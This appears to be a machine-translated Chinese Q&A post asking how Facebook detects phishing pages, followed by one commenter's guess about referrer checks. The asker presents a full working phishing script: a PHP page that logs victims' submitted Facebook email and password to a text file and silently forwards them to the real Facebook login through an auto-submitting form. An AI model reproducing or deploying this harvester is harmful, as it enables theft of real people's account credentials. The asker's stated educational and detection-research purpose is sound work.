我在做計算機安全方面的工作,目前我正在做網絡釣魚。Facebook網絡釣魚檢測
因此,爲了教育目的,我寫了一個簡單的「釣魚網頁」,我試圖瞭解Facebook如何檢測釣魚欺詐網頁。
我的index.html
是Facebook主頁,當我編輯它爲了重定向用戶到phishing.php
頁面。
phishing.php
:
<?php
$file = fopen('phishing.txt', 'a');
fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['pass'])."\n\n");
fclose($file);
?>
<form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm">
<?php
foreach ($_POST as $a => $b) {
echo "<input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'>";
}
?>
</form>
<script language="JavaScript">
document.frm.submit();
</script>
我的問題來這裏。一切都運行良好,除外,一旦用戶(我)進入的用戶名和密碼的事實,Facebook表示:
安全的注意事項:爲了您的安全,切勿在未設在Facebook網站上輸入您的Facebook密碼 .com
那麼Facebook使用哪種機制來檢測這樣的釣魚頁?
謝謝!
它可能會檢查您的引用者,看看它實際上是否來自Facebook或.. – Ali 2014-10-31 13:57:16